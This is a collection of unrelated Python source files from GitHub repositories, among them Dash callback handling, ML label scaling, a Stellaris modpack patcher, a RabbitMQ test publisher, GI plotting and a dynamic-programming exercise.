callback.\n raise exceptions.LayoutIsNotDefined('''\n Attempting to assign a callback to the application but\n the `layout` property has not been assigned.\n Assign the `layout` property before assigning callbacks.\n Alternatively, suppress this warning by setting\n `app.config['suppress_callback_exceptions']=True`\n '''.replace(' ', ''))\n\n for args, obj, name in [([output], Output, 'Output'),\n (inputs, Input, 'Input'),\n (state, State, 'State'),\n (events, Event, 'Event')]:\n\n if not isinstance(args, list):\n raise exceptions.IncorrectTypeException(\n 'The {} argument `{}` is '\n 'not a list of `dash.dependencies.{}`s.'.format(\n name.lower(), str(args), name\n ))\n\n for arg in args:\n if not isinstance(arg, obj):\n raise exceptions.IncorrectTypeException(\n 'The {} argument `{}` is '\n 'not of type `dash.{}`.'.format(\n name.lower(), str(arg), name\n ))\n\n if (not self.config.first('suppress_callback_exceptions',\n 'supress_callback_exceptions') and\n arg.component_id not in layout and\n arg.component_id != getattr(layout, 'id', None)):\n raise exceptions.NonExistantIdException('''\n Attempting to assign a callback to the\n component with the id \"{}\" but no\n components with id \"{}\" exist in the\n app\\'s layout.\\n\\n\n Here is a list of IDs in layout:\\n{}\\n\\n\n If you are assigning callbacks to components\n that are generated by other callbacks\n (and therefore not in the initial layout), then\n you can suppress this exception by setting\n `app.config['suppress_callback_exceptions']=True`.\n '''.format(\n arg.component_id,\n arg.component_id,\n list(layout.keys()) + (\n [] if not hasattr(layout, 'id') else\n [layout.id]\n )\n ).replace(' ', ''))\n\n if not self.config.first('suppress_callback_exceptions',\n 'supress_callback_exceptions'):\n\n if getattr(layout, 'id', None) == arg.component_id:\n component = layout\n else:\n component = layout[arg.component_id]\n\n if (hasattr(arg, 'component_property') and\n arg.component_property not in\n component.available_properties and not\n any(arg.component_property.startswith(w) for w in\n component.available_wildcard_properties)):\n raise exceptions.NonExistantPropException('''\n Attempting to assign a callback with\n the property \"{}\" but the component\n \"{}\" doesn't have \"{}\" as a property.\\n\n Here is a list of the available properties in \"{}\":\n {}\n '''.format(\n arg.component_property,\n arg.component_id,\n arg.component_property,\n arg.component_id,\n component.available_properties).replace(\n ' ', ''))\n\n if (hasattr(arg, 'component_event') and\n arg.component_event not in\n component.available_events):\n raise exceptions.NonExistantEventException('''\n Attempting to assign a callback with\n the event \"{}\" but the component\n \"{}\" doesn't have \"{}\" as an event.\\n\n Here is a list of the available events in \"{}\":\n {}\n '''.format(\n arg.component_event,\n arg.component_id,\n arg.component_event,\n arg.component_id,\n component.available_events).replace(' ', ''))\n\n if state and not events and not inputs:\n raise exceptions.MissingEventsException('''\n This callback has {} `State` {}\n but no `Input` elements or `Event` elements.\\n\n Without `Input` or `Event` elements, this callback\n will never get called.\\n\n (Subscribing to input components will cause the\n callback to be called whenver their values\n change and subscribing to an event will cause the\n callback to be called whenever the event is fired.)\n '''.format(\n len(state),\n 'elements' if len(state) > 1 else 'element'\n ).replace(' ', ''))\n\n if '.' in output.component_id:\n raise exceptions.IDsCantContainPeriods('''The Output element\n `{}` contains a period in its ID.\n Periods are not allowed in IDs right now.'''.format(\n output.component_id\n ))\n\n callback_id = '{}.{}'.format(\n output.component_id, output.component_property)\n if callback_id in self.callback_map:\n raise exceptions.CantHaveMultipleOutputs('''\n You have already assigned a callback to the output\n with ID \"{}\" and property \"{}\". An output can only have\n a single callback function. Try combining your inputs and\n callback functions together into one function.\n '''.format(\n output.component_id,\n output.component_property).replace(' ', ''))\n\n # TODO - Update nomenclature.\n # \"Parents\" and \"Children\" should refer to the DOM tree\n # and not the dependency tree.\n # The dependency tree should use the nomenclature\n # \"observer\" and \"controller\".\n # \"observers\" listen for changes from their \"controllers\". For example,\n # if a graph depends on a dropdown, the graph is the \"observer\" and the\n # dropdown is a \"controller\". In this case the graph's \"dependency\" is\n # the dropdown.\n # TODO - Check this map for recursive or other ill-defined non-tree\n # relationships\n # pylint: disable=dangerous-default-value\n def callback(self, output, inputs=[], state=[], events=[]):\n self._validate_callback(output, inputs, state, events)\n\n callback_id = '{}.{}'.format(\n output.component_id, output.component_property\n )\n self.callback_map[callback_id] = {\n 'inputs': [\n {'id': c.component_id, 'property': c.component_property}\n for c in inputs\n ],\n 'state': [\n {'id': c.component_id, 'property': c.component_property}\n for c in state\n ],\n 'events': [\n {'id': c.component_id, 'event': c.component_event}\n for c in events\n ]\n }\n\n def wrap_func(func):\n @wraps(func)\n def add_context(*args, **kwargs):\n\n output_value = func(*args, **kwargs)\n response = {\n 'response': {\n 'props': {\n output.component_property: output_value\n }\n }\n }\n\n return flask.Response(\n json.dumps(response,\n cls=plotly.utils.PlotlyJSONEncoder),\n mimetype='application/json'\n )\n\n self.callback_map[callback_id]['callback'] = add_context\n\n return add_context\n\n return wrap_func\n\n def dispatch(self):\n body = flask.request.get_json()\n inputs = body.get('inputs', [])\n state = body.get('state', [])\n output = body['output']\n\n target_id = '{}.{}'.format(output['id'], output['property'])\n args = []\n for component_registration in self.callback_map[target_id]['inputs']:\n args.append([\n c.get('value', None) for c in inputs if\n c['property'] == component_registration['property'] and\n c['id'] == component_registration['id']\n ][0])\n\n for component_registration in self.callback_map[target_id]['state']:\n args.append([\n c.get('value', None) for c in state if\n c['property'] == component_registration['property'] and\n c['id'] == component_registration['id']\n ][0])\n\n return self.callback_map[target_id]['callback'](*args)\n\n def _setup_server(self):\n self._generate_scripts_html()\n self._generate_css_dist_html()\n\n def run_server(self,\n port=8050,\n debug=False,\n **flask_run_options):\n self.server.run(port=port, debug=debug, **flask_run_options)\n","repo_name":"1pani/fund-rank-dashboard","sub_path":"venv/Lib/site-packages/dash/dash.py","file_name":"dash.py","file_ext":"py","file_size_in_byte":21484,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"26035538395","text":"import random\nimport sys\nimport argparse\n\nimport torch\nimport pandas as pd\nimport numpy as np\n#import numba\nfrom tqdm import tqdm\n\nfrom sklearn.metrics import r2_score\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn import preprocessing\nfrom sklearn.cluster import AgglomerativeClustering, KMeans\n\nclass Data:\n def __init__(self, sources, destinations, dest_categories, timestamps, edge_idxs, raw_labels, labels):\n self.sources = sources\n self.destinations = destinations\n self.dest_categories = dest_categories\n self.timestamps = timestamps\n self.edge_idxs = edge_idxs\n self.raw_labels = raw_labels\n self.labels = labels\n\nclass KBinsScaler:\n def __init__(self, n_bins, strategy=\"agg\"):\n self.n_bins = n_bins\n self.strategy = strategy\n\n def fit(self, X):\n X = X.flatten()\n # if strategy is kmeans, generte bin_edges_ with sklearn kmeans\n if self.strategy == \"kmeans\" or self.strategy == \"agg\":\n # reduce the n_cluster to ensure the first bin is always 0\n n_clusters = self.n_bins - 1\n if self.strategy == \"kmeans\":\n clustering_model = KMeans(n_clusters=n_clusters, random_state=0)\n else:\n clustering_model = AgglomerativeClustering(n_clusters=n_clusters, linkage='average')\n clustering_model.fit(X.reshape(-1, 1))\n self.bin_edges_ = np.sort(np.append(clustering_model.cluster_centers_.flatten(), 0))\n else: \n self.bin_edges_ = np.percentile(X, np.linspace(0, 100, self.n_bins - 1))\n return self\n\n def transform(self, X):\n X = X.flatten()\n # Assign each value to a bin\n # if strategy is kmeans, assign X_binned to the closest bin_edges_ \n if self.strategy == \"kmeans\":\n X_binned = np.zeros(len(X), dtype=int)\n for i in range(len(X)):\n X_binned[i] = np.argmin(np.abs(X[i] - self.bin_edges_))\n else:\n X_binned = np.digitize(X, self.bin_edges_, right=True)\n return X_binned\n\n def fit_transform(self, X):\n return self.fit(X).transform(X)\n\n def inverse_transform(self, X):\n return self.bin_edges_[np.clip(np.round(X), 0, len(self.bin_edges_)-1).astype(int)]\n\n def __repr__(self):\n return \"KBinsScaler(n_bins={}, strategy{})\".format(self.n_bins, self.strategy)\n\nclass KBinsDiscretizer(KBinsScaler):\n def transform(self, X):\n X_binned = super().transform(X)\n # Create one-hot encoding\n one_hot = np.zeros((len(X), self.n_bins))\n one_hot[np.arange(len(X)), X_binned] = 1\n return one_hot\n\n def inverse_transform(self, X):\n return self.bin_edges_[np.argmax(X)]\n \n def __repr__(self):\n return \"KBinsDiscretizer(n_bins={}, strategy{})\".format(self.n_bins, self.strategy)\n\ndef get_data(dataset_name, scale_label, device, num_classes=10, classification_mode=False):\n ### Load data and train val test split\n graph_df = pd.read_csv('./processed/ml_{}.csv'.format(dataset_name))\n edge_features = np.load('./processed/ml_{}.npy'.format(dataset_name))\n node_features = np.load('./processed/ml_{}_node.npy'.format(dataset_name)) \n\n val_time, test_time = list(np.quantile(graph_df.ts, [0.70, 0.85]))\n\n ts_l = graph_df.ts.values\n valid_train_flag = (ts_l <= val_time)\n\n\n train_df = graph_df[valid_train_flag]\n train_i = train_df.i.unique()\n # filter out new merchants in the valid/test\n from scipy import stats\n\n graph_df = graph_df[graph_df.i.isin(train_i)]\n\n ts_l = graph_df.ts.values\n valid_train_flag = (ts_l <= val_time)\n src_l = graph_df.u.values\n dst_l = graph_df.i.values\n cat_l = graph_df.cat.values\n e_idx_l = graph_df.idx.values\n # scaling labels\n scaleUtil = ScaleUtil(scale_label, device, num_classes=num_classes, classification_mode=classification_mode)\n label_l, raw_label_l = scaleUtil.transform_df(graph_df, valid_train_flag)\n\n full_data = Data(sources=src_l, \n destinations=dst_l, \n dest_categories=cat_l, \n timestamps=ts_l, \n edge_idxs=e_idx_l, \n raw_labels=raw_label_l, \n labels=label_l)\n\n def get_dataset(flag):\n ds = Data(sources=src_l[flag], \n destinations=dst_l[flag], \n dest_categories=cat_l[flag], \n timestamps=ts_l[flag], \n edge_idxs=e_idx_l[flag], \n raw_labels=raw_label_l[flag], \n labels=label_l[flag])\n return ds\n \n train_data = get_dataset(valid_train_flag)\n # select validation and test dataset\n valid_val_flag = (ts_l <= test_time) * (ts_l > val_time)\n val_data = get_dataset(valid_val_flag)\n\n valid_test_flag = ts_l > test_time\n test_data = get_dataset(valid_test_flag)\n return node_features, edge_features, full_data, train_data, val_data, test_data, scaleUtil\n\n\nclass ScaleUtil:\n def __init__(self, scale_label, device, num_classes, classification_mode):\n self.scale_label = scale_label\n if scale_label == 'MinMax':\n self.sscaler = preprocessing.MinMaxScaler\n elif scale_label == 'Quantile':\n self.scaler = preprocessing.QuantileTransformer\n elif scale_label == 'Log':\n self.scaler = preprocessing.StandardScaler\n elif scale_label == 'Cbrt':\n self.scaler = preprocessing.StandardScaler\n elif scale_label.startswith('Discr'):\n self.num_classes = num_classes\n if classification_mode:\n self.scaler = KBinsDiscretizer\n else:\n self.scaler = KBinsScaler\n self.device = device\n self.i2cat = None\n self.scalers_dict = None\n self.classification_mode = classification_mode\n \n def transform_df(self, original_graph_df, valid_train_flag):\n graph_df = original_graph_df.copy()\n graph_df['raw_label'] = graph_df.label.copy()\n \n self.i2cat = graph_df.groupby('i').first().reset_index().set_index('i')['cat'].to_dict()\n # TODO: whether to clip the label?\n for cat in set(self.i2cat.values()):\n orig_labels = graph_df.loc[(graph_df.cat == cat) & valid_train_flag, 'label'].values\n lower = np.quantile(orig_labels, 0.001)\n upper = np.quantile(orig_labels, 0.999)\n graph_df.loc[(graph_df.cat == cat) & valid_train_flag, 'label'] = np.clip(orig_labels, lower, upper)\n \n if self.scale_label == 'none':\n # no need to scale\n return graph_df.label.values, graph_df.label.values\n scaled_label_cols = 'label'\n if self.scale_label == 'Cbrt':\n graph_df.label = np.cbrt(graph_df.label.values)\n else:\n graph_df['label'] = self.prepare_transform(graph_df.label.values)\n if self.classification_mode:\n scaled_label_cols=[f'label_{i}' for i in range(self.num_classes)]\n graph_df[scaled_label_cols] = np.zeros(shape=(graph_df.shape[0],self.num_classes))\n train_df = graph_df[valid_train_flag]\n self.scalers_dict = {}\n if self.scale_label.endswith('#cat'):\n for cat in set(self.i2cat.values()):\n if self.scale_label.startswith('Discr'):\n self.scalers_dict[cat] = self.scaler(n_bins=self.num_classes, strategy=self.scale_label.split('-')[1])\n else:\n self.scalers_dict[cat] = self.scaler()\n train_label_vals = train_df[train_df.cat==cat].label.values\n self.scalers_dict[cat].fit(train_label_vals.reshape(-1, 1))\n label_vals = graph_df.loc[graph_df.cat == cat].label.values \n graph_df.loc[graph_df.cat == cat, scaled_label_cols] = self.scalers_dict[cat].transform(label_vals.reshape(-1, 1))\n else:\n train_label_vals = train_df.label.values\n if self.scale_label.startswith('Discr'):\n self.scalers_dict['#all'] = self.scaler(n_bins=self.num_classes, strategy=self.scale_label.split('-')[1])\n else:\n self.scalers_dict['#all'] = self.scaler()\n self.scalers_dict['#all'].fit(train_label_vals.reshape(-1, 1))\n label_vals = graph_df.label.values \n graph_df[scaled_label_cols] = self.scalers_dict['#all'].transform(label_vals.reshape(-1, 1))\n return graph_df[scaled_label_cols].values, graph_df.raw_label.values\n \n def prepare_transform(self, label_vals):\n if self.scale_label == 'Log':\n label_vals = np.sign(label_vals) * np.log(np.abs(label_vals)+1)\n elif self.scale_label == 'Cbrt':\n label_vals = np.cbrt(label_vals)\n return label_vals\n\n def convert_to_raw_label_scale(self, dst_l_cut, preds):\n raw_preds = []\n for dst, pred in zip(dst_l_cut, preds):\n if self.scale_label == 'Cbrt':\n raw = np.power(pred, 3)\n raw_preds.append(raw)\n else:\n if (self.i2cat is None) or (self.scalers_dict is None):\n raise RuntimeError(\"self.i2cat or self.scalers_dict is None. Run ScaleUtil.transform_df function first\")\n if self.scale_label.endswith('#cat'):\n \n cat = self.i2cat[dst]\n else:\n cat = '#all'\n raw = self.scalers_dict[cat].inverse_transform(pred.reshape(1, -1))\n if self.scale_label == 'Log':\n raw = np.sign(raw) * (np.exp(np.abs(raw))-1)\n elif self.scale_label == 'Cbrt':\n raw = np.power(raw, 3)\n if len(raw.shape) > 1:\n raw = raw.item()\n raw_preds.append(raw)\n if isinstance(preds, np.ndarray):\n return np.array(raw_preds)\n else:\n return torch.tensor(raw_preds, dtype=float, device=self.device)","repo_name":"ConsGene/TGAT","sub_path":"data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":10051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72426209865","text":"# This utility examines all the files in the ! Modpack folder (or in the folder specified by the -mod command line argument).\n# The files are compared to the files in the extracted mod folders that would be put into the modpack folder according to the whitelist.txt file.\n# Any files in the modpack folder that differ from the expected file are copied into the mod\\ModpackPatch folder.\n\n# What is the point of all this?\n\n# After merging mods into a modpack, a user may want to replace one of the conflicting files with a file from a different mod,\n# or perhaps even make manual modifications to the files in the modpack.\n# Running this script to create a modpack patch is a way to sort of \"save\" the changes made to a modpack.\n\n# The various mods in the modpack can then be updated via the standard workflow when new releases of any of the mods come out,\n# after which a user can compare changed files in the mod with their custom changes in the patch through whatever diff method the user prefers.\n\n# The modpackPatch is not intended to be added to your active mods in the stellaris launcher (it will add nothing the modpack doesn't already add)\n# it's just a tool to help customize modpacks, save modified files, and save the way you've resolved conflicts,\n# and then easily re-impliment or diff the changes you've made when new versions of the mods come out or when you add new mods to the modpack.\n\nimport os\nimport glob\nfrom os.path import isfile\n\nfrom shutil import copy2\nfrom filecmp import cmp as compare\nfrom argparse import ArgumentParser\n\n\ndef mod_patch(modpack_name, add_to_whitelist=True, check_only=False):\n changes_present = False\n changeSet = set()\n patch_name = modpack_name + \"Patch\"\n print(f\"\\nChecking for customizations in {modpack_name}...\\n\")\n fileSet = {\"duplicateFilesList.txt\", \"allFilesList.txt\", \"whitelist.txt\"} # To avoid copying these meta lists to the patch folder.\n patch_created = False\n # Keep only the alphanumeric characters in the names in the whitelist, remove blank lines:\n fileList = glob.glob('mod\\\\! Modpack Baseline\\\\**', recursive=True)\n for cur_file in fileList:\n if not os.path.isfile(cur_file) or \".mod\" in cur_file:\n continue # Skip directory the folders themselves and mod descriptor files.\n file_path = cur_file.split(os.sep)\n file_path[0] = \"mod\" # Change folder to the modpack.\n file_path[1] = modpack_name # Change folder to the modpack.\n path_within_mod = os.sep.join(file_path[2:])\n if path_within_mod in fileSet:\n # A file with this path has already been compared.\n # The cur_file might be a conflict or maybe a duplicate.\n # Either way, no checking is necessary, so go to the next file.\n continue\n try:\n if not isfile(os.sep.join(file_path)):\n with open(os.sep.join(file_path),\"w+\") as f:\n f.write(\"#Overriden\")\n #print(cur_file)\n #print(file_path)\n if compare(cur_file, os.sep.join(file_path)):\n # The first mod on the whitelist that has this file has an identical file to the file in the modpack.\n # This means no customization has been made, and nothing need be done.\n fileSet.add(path_within_mod)\n else:\n # This file has been altered.\n if check_only:\n changes_present = True\n if path_within_mod not in changeSet:\n print(f\"File in modpack differs from file in mod: {os.sep.join(cur_file.split(os.sep)[1:])}\")\n changeSet.add(path_within_mod)\n continue # Advance to next file without any copying.\n # Copy the file to the patch folder.\n print(f\"Adding customized file to patch: {path_within_mod}\")\n patch_created = True\n fileSet.add(path_within_mod)\n modified_file = os.sep.join(file_path)\n file_path[1] = patch_name # Change folder to the patch.\n target_path = os.sep.join(file_path)\n target_dir = os.path.dirname(target_path)\n if not os.path.exists(target_dir):\n os.makedirs(target_dir)\n copy2(modified_file, target_path)\n except Exception as e:\n print(cur_file)\n print(e)\n print(f\"Adding customized file to patch: {path_within_mod}\")\n patch_created = True\n fileSet.add(path_within_mod)\n modified_file = os.sep.join(file_path)\n file_path[1] = patch_name # Change folder to the patch.\n target_path = os.sep.join(file_path)\n target_dir = os.path.dirname(target_path)\n if not os.path.exists(target_dir):\n os.makedirs(target_dir)\n copy2(modified_file, target_path)\n\n # Check the modpack for unique files that are not present in any of the mods on the whitelist.\n all_mod_files = glob.glob(f'mod{os.sep}{modpack_name}{os.sep}**', recursive=True)\n for cur_file in all_mod_files:\n if not os.path.isfile(cur_file) or \".mod\" in cur_file:\n continue # Skip directory the folders themselves and mod descriptor files.\n file_path = cur_file.split(os.sep)\n path_within_mod = os.sep.join(file_path[2:])\n if path_within_mod not in fileSet:\n # Even after looking through all of the mods, we've never seen this file. It must be new.\n if check_only:\n changes_present = True\n if path_within_mod not in changeSet:\n print(f\"File has been added to modpack: {path_within_mod}\")\n changeSet.add(path_within_mod)\n continue # Advance to next file without any copying.\n # Copy the new file to the patch.\n print(f\"Adding unique file to patch: {path_within_mod}\")\n patch_created = True\n file_path = cur_file.split(os.sep)\n file_path[1] = patch_name\n target_path = os.sep.join(file_path)\n target_dir = os.path.dirname(target_path)\n if not os.path.exists(target_dir):\n os.makedirs(target_dir)\n copy2(cur_file, target_path)\n\n if check_only:\n if changes_present:\n return True\n return False # Done checking for new changes - there were none!\n\n if patch_created:\n if not os.path.isfile(f\"mod{os.sep}{patch_name}.mod\"):\n with open(f\"mod{os.sep}{patch_name}.mod\", \"w+\") as f:\n f.writelines([f\"name=\\\"{patch_name}\\\"\\n\", f\"path=\\\"mod{os.sep}{patch_name}\\\"\\n\", \"tags={\\n\", \"\\t\\\"Gameplay\\\"\\n\", \"}\\n\", \"supported_version=\\\"3.*.*\\\"\\n\"])\n print(f\"\\n\\nCustomized files in \\\"{modpack_name}\\\" have been copied to \\\"{patch_name}\\\".{' The patch has been added to your whitelist.' if add_to_whitelist else ''}\\n\")\n else:\n print(f\"\\n\\nNo customized files found in \\\"{modpack_name}\\\". No patch created.\\n\")\n\n # Return a bool indicating that a patch has indeed been created.\n return patch_created\n\n\ndef get_name_from_cl():\n parser = ArgumentParser()\n parser.add_argument('-n', '--modpack_name', default=\"! modpack\", type=str,\n help='The name of the modpack (both the folder name and the name in the stellaris launcher).')\n args = parser.parse_args()\n return args.modpack_name\n\n\nif __name__ == \"__main__\":\n modpack_name = get_name_from_cl()\n mod_patch(modpack_name)\n","repo_name":"D4rkstalker/StellarisModpackUtility","sub_path":"make_mod_patch.py","file_name":"make_mod_patch.py","file_ext":"py","file_size_in_byte":7561,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"70524633865","text":"import requests\n\nfrom extract.extractor import Extractor\n\n_FORECAST_URL = 'http://ES_search_demo.com/document/record/_search?pretty=true'\n_CITIES = {\n 'San Francisco': {'id': 5391959, 'name': 'San Francisco', 'country': 'US',\n 'coord': {'lon': -122.419418, 'lat': 37.774929}},\n 'Vancouver': {'id': 6173331, 'name': 'Vancouver', 'country': 'CA', 'coord': {'lon': -123.119339, 'lat': 49.24966}},\n 'Toronto': {'id': 6167865, 'name': 'Toronto', 'country': 'CA', 'coord': {'lon': -79.416298, 'lat': 43.700111}},\n 'Edmonton': {'id': 5946768, 'name': 'Edmonton', 'country': 'CA', 'coord': {'lon': -113.468712, 'lat': 53.55014}},\n 'New York': {'id': 5128581, 'name': 'New York', 'country': 'US', 'coord': {'lon': -74.005966, 'lat': 40.714272}},\n 'Sao Paulo': {'id': 3448439, 'name': 'Sao Paulo', 'country': 'BR', 'coord': {'lon': -46.636108, 'lat': -23.547501}},\n 'Tokyo': {'id': 1850147, 'name': 'Tokyo', 'country': 'JP', 'coord': {'lon': 139.691711, 'lat': 35.689499}},\n 'Hsinchu': {'id': 1675151, 'name': 'Hsinchu', 'country': 'TW', 'coord': {'lon': 120.968613, 'lat': 24.80361}},\n 'Melbourne': {'id': 2158177, 'name': 'Melbourne', 'country': 'AU', 'coord': {'lon': 144.963318, 'lat': -37.813999}},\n}\n\n\nclass OpenWeatherExtractor(Extractor):\n def __init__(self):\n super().__init__()\n pass\n\n def get_weather(self):\n pass\n\n def get_forecast(self):\n data = '''{\n \"query\": {\n \"bool\": {\n \"must\": [\n {\n \"text\": {\n \"record.document\": \"SOME_JOURNAL\"\n }\n },\n {\n \"text\": {\n \"record.articleTitle\": \"farmers\"\n }\n }\n ],\n \"must_not\": [],\n \"should\": []\n }\n },\n \"from\": 0,\n \"size\": 50,\n \"sort\": [],\n \"facets\": {}\n }'''\n response = requests.post(_FORECAST_URL, data=data)\n","repo_name":"andrewkho/ororo-etl","sub_path":"extract/open_weather.py","file_name":"open_weather.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3297810282","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.main, name=\"learning\"),\n path('validate', views.validate, name=\"validate\"),\n path('detail', views.detail, name=\"learning-detail\"),\n path('model_save', views.save_model_list, name=\"model-save\"),\n path('learning', views.learning_models, name=\"learning-models\"),\n]","repo_name":"KHM13/wave_ml_nurier","sub_path":"wave_ml/apps/learning/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2835114233","text":"#!/usr/bin/python\n# *-* coding: utf-8 *-*\n\n\"\"\"\nThis file is part of DLComix.\n\n DLComix is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n DLComix is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with DLComix. If not, see .\n\n\"\"\"\n\n\"\"\"\nInit of software\nDefine the application and call DLComix Class\nDefine locale language and use English by default\n\"\"\"\n\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\nimport dlcomix, sys\n\ndef main(args):\n a = QApplication(args)\n locale = QLocale.system().name()\n qtTranslator = QTranslator()\n if qtTranslator.load(\"qt_\"+locale):\n a.installTranslator(qtTranslator)\n appTranslator = QTranslator()\n if appTranslator.load(\"LOCALE/DLCOMIX_\"+locale+\".qm\"):\n a.installTranslator(appTranslator)\n else:\n appTranslator.load(\"LOCALE/DLCOMIX_en_US\")\n a.installTranslator(appTranslator)\n fenetre = dlcomix.DLComix()\n fenetre.show()\n r=a.exec_()\n return r\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"Freeculturexx/DLComix","sub_path":"dlcomix/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"73200710666","text":"import json\nimport random\n\nimport pika\n\n# import time\n\n\ndef send_report_messages():\n credentials = pika.PlainCredentials(\"guest\", \"guest\")\n parameters = pika.ConnectionParameters(\"localhost\", 5700, \"/\", credentials)\n connection = pika.BlockingConnection(parameters)\n channel = connection.channel()\n channel.queue_declare(queue=\"data_feed\", durable=True)\n\n body = {\"ask\": 10049, \"bid\": 9983, \"security_id\": \"MSFT\", \"timestamp\": \"1685104715\"}\n message = json.dumps({\"message_type\": \"price\", \"body\": body})\n channel.basic_publish(\n exchange=\"financial_exchange\",\n routing_key=\"data_feed\",\n body=message,\n properties=pika.BasicProperties(delivery_mode=2),\n )\n print(f\"Sent message: {message}\")\n\n connection.close()\n\n\nif __name__ == \"__main__\":\n send_report_messages()\n","repo_name":"christian-spooner/stock-exchange-simulation","sub_path":"test-scripts/rabbitmq/test_price_messages.py","file_name":"test_price_messages.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"72348018824","text":"from CAP_Personality_Class import CAP_P\r\nfrom CAP_Art_Class import CAP_A\r\nimport time\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n The program executes the conversation which\r\n will use the values produced to create an\r\n abstract drawing using turtles.\r\n\r\n :return: None\r\n \"\"\"\r\n\r\n cap_p = CAP_P()\r\n\r\n cap_p.start_convo()\r\n cap_p.dogs_and_cats()\r\n start = cap_p.start_pos()\r\n loop = cap_p.ask_age()\r\n multiplier = cap_p.age_num_multiplier()\r\n side_a = cap_p.fake_guessing_game_low()\r\n side_b = cap_p.fake_guessing_game_high()\r\n length = cap_p.ask_height()\r\n color = cap_p.ask_fav_color()\r\n cap_p.end_convo()\r\n\r\n time.sleep(3)\r\n\r\n cap_a = CAP_A(start, loop * multiplier, side_a, side_b, length, color)\r\n cap_a.create_art()\r\n\r\n\r\nmain()\r\n","repo_name":"TMGWill/CAP-Project","sub_path":"CAP.exe.py","file_name":"CAP.exe.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21425085445","text":"import numpy as np\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn import preprocessing\n\n\ndef plot_corr(column_name, color_col_name, gi_usda_df, pic_name, title, range=0.005):\n print(gi_usda_df[column_name].value_counts())\n print(\"-------------------------------------------------\")\n max_index = gi_usda_df[column_name].idxmax()\n max_in_col = gi_usda_df[column_name].values[max_index]\n\n bins_values = np.arange(0, max_in_col, range)\n labels_values = np.arange(0, len(bins_values) - 1, 1)\n gi_usda_df['log_values'] = \"\"\n gi_usda_df['log_values'] = np.log(gi_usda_df[column_name])\n gi_usda_df['log_values'] += 6\n gi_usda_df[color_col_name] = \"\"\n gi_usda_df[color_col_name] = pd.cut(gi_usda_df['log_values'], bins=bins_values, labels=labels_values)\n\n # gi_usda_df[color_col_name] = gi_usda_df[column_name].fillna(max_in_col)\n gi_usda_df = gi_usda_df[pd.notnull(gi_usda_df[color_col_name])]\n\n color_arr = gi_usda_df[color_col_name]\n\n x = gi_usda_df['Carbohydrt_(g)']\n y = gi_usda_df['GI Value']\n plt.figure(figsize=(17, 12))\n\n plt.scatter(x=x, y=y, c=color_arr, cmap='gist_stern', s=75)\n font = {'family': 'serif',\n 'color': 'black',\n 'weight': 'normal',\n 'size': 25,\n }\n plt.title(title, fontdict=font)\n font = {'color': 'black',\n 'weight': 'bold',\n 'size': 18,\n }\n plt.xlabel(\"Carbohydrt\", fontdict=font)\n plt.ylabel(\"GI Value\", fontdict=font)\n plt.xticks(fontsize=15)\n plt.yticks(fontsize=15)\n cbar = plt.colorbar()\n\n # cbar.ax.tick_params(labelsize=15)\n cbar.set_ticks([])\n cbar.set_label(column_name, weight='bold', size=18)\n\n if not os.getcwd().__contains__(\"Graphs & Photos\"):\n os.chdir(os.getcwd()[:os.getcwd().index(\"Excel_files\")] + \"Graphs & Photos\")\n plt.savefig(pic_name + '.png')\n","repo_name":"NoaOr/GI-Project","sub_path":"Plot_Graphs/carbo_vs_GI.py","file_name":"carbo_vs_GI.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"39718984754","text":"\"\"\"\nAs it is Tushar's Birthday on March 1st, he decided to throw a party to all his friends at TGI Fridays in Pune. Given are the eating capacity of each friend, filling capacity of each dish and cost of each dish. A friend is satisfied if the sum of the filling capacity of dishes he ate is equal to his capacity. Find the minimum cost such that all of Tushar's friends are satisfied (reached their eating capacity).\nNOTE:\nEach dish is supposed to be eaten by only one person. Sharing is not allowed.\nEach friend can take any dish unlimited number of times.\nThere always exists a dish with filling capacity 1 so that a solution always exists.\n\"\"\"\n#dp[id][capacity] = cost\n\nclass Solution:\n #@param A : list of int -> eating capacity\n #@param B : list of int -> filing capacity\n #@param C : list of int -> cost\n #@return int -> total cost\n def solve(self, A, B, C):\n mc = max(A)\n dp = [[0 for i in range(mc + 1)] for i in range(len(B) + 1)]\n\n for j in range(1, mc + 1):\n dp[0][j] = 99\n \n for i in range(1, len(B) + 1):\n for j in range(1, mc + 1):\n if j - B[i - 1] >= 0:\n dp[i][j] = min(dp[i - 1][j], dp[i][j - B[i - 1]] + C[i - 1])\n else:\n dp[i][j] = dp[i - 1][j]\n \n tc = 0\n for c in A:\n tc+= dp[i][c]\n return tc\n\nA = [2, 4, 6]\nB = [2, 1, 3]\nC = [2, 5, 3]\nt = Solution()\nprint(t.solve(A, B, 